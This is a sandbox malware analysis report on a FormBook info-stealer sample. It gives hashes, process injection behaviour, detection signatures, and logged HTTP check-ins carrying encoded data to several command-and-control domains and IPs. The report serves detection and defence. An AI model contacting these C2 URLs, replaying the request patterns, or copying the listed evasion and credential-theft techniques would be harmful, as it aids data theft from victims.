Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wSoShbuXnJ.exe

Overview

General Information

Sample name:wSoShbuXnJ.exe
renamed because original name is a hash value
Original sample name:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5.exe
Analysis ID:1588797
MD5:feea3eb7d321ac0ff06d81683ac140ed
SHA1:9a18261e4703b51dec32610dd0c822de8ba2d752
SHA256:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wSoShbuXnJ.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\wSoShbuXnJ.exe" MD5: FEEA3EB7D321AC0FF06D81683AC140ED)
    • wSoShbuXnJ.exe (PID: 7960 cmdline: "C:\Users\user\Desktop\wSoShbuXnJ.exe" MD5: FEEA3EB7D321AC0FF06D81683AC140ED)
      • RAdsmABlJtKpzt.exe (PID: 7136 cmdline: "C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 6668 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • RAdsmABlJtKpzt.exe (PID: 6336 cmdline: "C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6648 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.wSoShbuXnJ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.wSoShbuXnJ.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:43:26.279884+010020507451Malware Command and Control Activity Detected192.168.2.1049980104.21.86.11180TCP
                2025-01-11T05:43:57.983996+010020507451Malware Command and Control Activity Detected192.168.2.1049985194.58.112.17480TCP
                2025-01-11T05:44:11.998202+010020507451Malware Command and Control Activity Detected192.168.2.1049989134.122.191.18780TCP
                2025-01-11T05:44:26.355978+010020507451Malware Command and Control Activity Detected192.168.2.1049993156.234.28.10180TCP
                2025-01-11T05:44:39.808998+010020507451Malware Command and Control Activity Detected192.168.2.1049997209.74.79.4280TCP
                2025-01-11T05:44:53.598421+010020507451Malware Command and Control Activity Detected192.168.2.1050001208.91.197.2780TCP
                2025-01-11T05:45:07.352230+010020507451Malware Command and Control Activity Detected192.168.2.1050005185.101.158.11380TCP
                2025-01-11T05:45:20.654742+010020507451Malware Command and Control Activity Detected192.168.2.1050009104.21.48.23380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:43:26.279884+010028554651A Network Trojan was detected192.168.2.1049980104.21.86.11180TCP
                2025-01-11T05:43:57.983996+010028554651A Network Trojan was detected192.168.2.1049985194.58.112.17480TCP
                2025-01-11T05:44:11.998202+010028554651A Network Trojan was detected192.168.2.1049989134.122.191.18780TCP
                2025-01-11T05:44:26.355978+010028554651A Network Trojan was detected192.168.2.1049993156.234.28.10180TCP
                2025-01-11T05:44:39.808998+010028554651A Network Trojan was detected192.168.2.1049997209.74.79.4280TCP
                2025-01-11T05:44:53.598421+010028554651A Network Trojan was detected192.168.2.1050001208.91.197.2780TCP
                2025-01-11T05:45:07.352230+010028554651A Network Trojan was detected192.168.2.1050005185.101.158.11380TCP
                2025-01-11T05:45:20.654742+010028554651A Network Trojan was detected192.168.2.1050009104.21.48.23380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T05:43:50.308035+010028554641A Network Trojan was detected192.168.2.1049982194.58.112.17480TCP
                2025-01-11T05:43:52.866259+010028554641A Network Trojan was detected192.168.2.1049983194.58.112.17480TCP
                2025-01-11T05:43:55.424624+010028554641A Network Trojan was detected192.168.2.1049984194.58.112.17480TCP
                2025-01-11T05:44:04.341308+010028554641A Network Trojan was detected192.168.2.1049986134.122.191.18780TCP
                2025-01-11T05:44:06.880750+010028554641A Network Trojan was detected192.168.2.1049987134.122.191.18780TCP
                2025-01-11T05:44:09.419966+010028554641A Network Trojan was detected192.168.2.1049988134.122.191.18780TCP
                2025-01-11T05:44:18.744320+010028554641A Network Trojan was detected192.168.2.1049990156.234.28.10180TCP
                2025-01-11T05:44:21.251999+010028554641A Network Trojan was detected192.168.2.1049991156.234.28.10180TCP
                2025-01-11T05:44:23.801868+010028554641A Network Trojan was detected192.168.2.1049992156.234.28.10180TCP
                2025-01-11T05:44:32.134900+010028554641A Network Trojan was detected192.168.2.1049994209.74.79.4280TCP
                2025-01-11T05:44:34.685203+010028554641A Network Trojan was detected192.168.2.1049995209.74.79.4280TCP
                2025-01-11T05:44:37.239559+010028554641A Network Trojan was detected192.168.2.1049996209.74.79.4280TCP
                2025-01-11T05:44:45.380494+010028554641A Network Trojan was detected192.168.2.1049998208.91.197.2780TCP
                2025-01-11T05:44:47.931578+010028554641A Network Trojan was detected192.168.2.1049999208.91.197.2780TCP
                2025-01-11T05:44:50.517452+010028554641A Network Trojan was detected192.168.2.1050000208.91.197.2780TCP
                2025-01-11T05:44:59.537534+010028554641A Network Trojan was detected192.168.2.1050002185.101.158.11380TCP
                2025-01-11T05:45:02.166501+010028554641A Network Trojan was detected192.168.2.1050003185.101.158.11380TCP
                2025-01-11T05:45:04.796710+010028554641A Network Trojan was detected192.168.2.1050004185.101.158.11380TCP
                2025-01-11T05:45:13.012282+010028554641A Network Trojan was detected192.168.2.1050006104.21.48.23380TCP
                2025-01-11T05:45:15.558939+010028554641A Network Trojan was detected192.168.2.1050007104.21.48.23380TCP
                2025-01-11T05:45:18.139702+010028554641A Network Trojan was detected192.168.2.1050008104.21.48.23380TCP
                2025-01-11T05:45:26.366691+010028554641A Network Trojan was detected192.168.2.10500103.252.97.8680TCP
                2025-01-11T05:45:29.508511+010028554641A Network Trojan was detected192.168.2.10500113.252.97.8680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFFAvira URL Cloud: Label: malware
                Source: http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/Avira URL Cloud: Label: malware
                Source: http://www.elinor.club/1ne4/Avira URL Cloud: Label: malware
                Source: http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.e8af.xyzAvira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w==Avira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7mAvira URL Cloud: Label: malware
                Source: http://www.e8af.xyz/hhdc/Avira URL Cloud: Label: malware
                Source: http://www.graviton.energy/y54z/Avira URL Cloud: Label: malware
                Source: http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.primespot.live/b8eq/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: wSoShbuXnJ.exeVirustotal: Detection: 76%Perma Link
                Source: wSoShbuXnJ.exeReversingLabs: Detection: 71%
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: wSoShbuXnJ.exeJoe Sandbox ML: detected
                Source: wSoShbuXnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wSoShbuXnJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710250709.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3137744044.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wSoShbuXnJ.exe, wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C7B0 FindFirstFileW,FindNextFileW,FindClose,11_2_0294C7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax11_2_02939F20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi11_2_0293E3A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h11_2_035A04BE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49980 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49980 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50008 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49989 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49989 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50005 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49985 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49985 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50009 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50009 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49997 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49997 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50001 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50001 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49993 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 3.252.97.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 3.252.97.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 209.74.79.42:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.pbfgm.xyz
                Source: DNS query: www.e8af.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.79.42 209.74.79.42
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pbfgm.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.smalleyes.icuConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dp9c/?UPxHl=S80HqRlhn&rFbdy=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDF3/VOwEaJ+vjCUy5RvaSFOliQEf2CQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.btblxhh.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.primespot.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mohawktooldie.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.graviton.energyConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ausyva4.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global trafficDNS traffic detected: DNS query: www.phdcoach.pro
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.smalleyes.icu
                Source: global trafficDNS traffic detected: DNS query: www.btblxhh.top
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.mohawktooldie.online
